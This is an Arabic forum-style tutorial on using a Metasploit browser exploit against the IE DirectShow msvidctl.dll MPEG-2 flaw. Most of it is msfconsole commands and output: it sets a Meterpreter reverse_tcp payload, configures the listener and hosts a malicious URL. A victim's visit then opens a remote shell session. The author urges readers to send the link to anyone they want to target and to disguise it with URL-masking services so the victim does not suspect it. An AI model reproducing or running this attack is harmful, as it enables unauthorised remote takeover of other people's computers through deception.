اليوم أنا رح اشرحلكم أخطر ثغرة هذه الأيام والمايكروسفت احد الأن ما لقت لها
ترقيع لأنها ثغرة محقونة في ملف مهم من الويندوز وهو ملف msvidctl.dllوهذا الملف
معروف بأنه ملف ActiveX أي الملف الذي يتحكم بالصورة أظن بأن الكل يعرفه
والثغرة قد سميت بــــــــــــــــــــــــــ:
IE DirectShow (msvidctl.dll) MPEG-2
وقد تمت اضافة الثغرة الى التحديث الاخير للميتاسبلوات باسم
Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
وهذا ما سأعتمد عليه في الشرح
البسيط أرجوا أن لا يكون الشرح صعب لأنه بالنسبة لي لم يكن كذلك فأرجوا أن يكون بالنسبة
لكم أيضا أحبائي المهم وبدون اطالة نبدأمع الشرح:
نقوم بفتح الميتا سبلوات وهذا بعد أخر تحديث طبعا
كود:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole [sudo] password for carlos: | | _) | __ `__ _ __| _` | __| __ | _ | __| | | | __/ | ( |__ | | | ( | | | _| _| _|___|__|__,_|____/ .__/ _|___/ _|__| _| =[ msf v3.3-dev + -- --=[ 384 exploits - 261 payloads + -- --=[ 20 encoders - 7 nops =[ 166 aux msf >
نقوم باختيار هذا الامر فهو الاهم
PAYLOAD => windows/meterpreter/reverse_tcp
لاحظا الخيارات :
كود:
msf > use exploit/windows/browser/msvidctl_mpeg2 msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(msvidctl_mpeg2) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
سينتج لنا بعد ذلك التالي:
كود:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80 SRVPORT => 80 msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158 LHOST => 192.168.1.158 msf exploit(msvidctl_mpeg2) > set URIPATH ChOrAhBiL SaFa7.html URIPATH => ChOrAhBiL SaFa7.html msf exploit(msvidctl_mpeg2) > exploit [*] Exploit running as background job. msf exploit(msvidctl_mpeg2) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:80/ChOrAhBiL SaFa7.html [*] Local IP: http://192.168.1.158:80/ChOrAhBiL SaFa7.html [*] Server started.
بعد ذلك نتتج لنا ملف من نوع gif نقوم بارساله هو والرابط لأي أحد نود استهدافه
http://192.168.1.158:80/ChOrAhBiL SaFa7.html
هذا الرابط لمن لم يفهم من الاحسن تمويه الرابط بمواقع التمويه لأنه ممكن يشك فيه هيك
بعدما يفتح الضحية الرابط ستمكننا الاكسبلورر من الاستغلال لاحظـــــــــــــــــــــوا:
كود:
[*] Sending HTML to 192.168.1.139:1126... [*] Sending exploit to 192.168.1.139:1126... [*] Sending GIF to 192.168.1.139:1126... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (206848 bytes) [*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1127) msf exploit(msvidctl_mpeg2) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
وكل الاحباب والاصدقاء بدون استثناء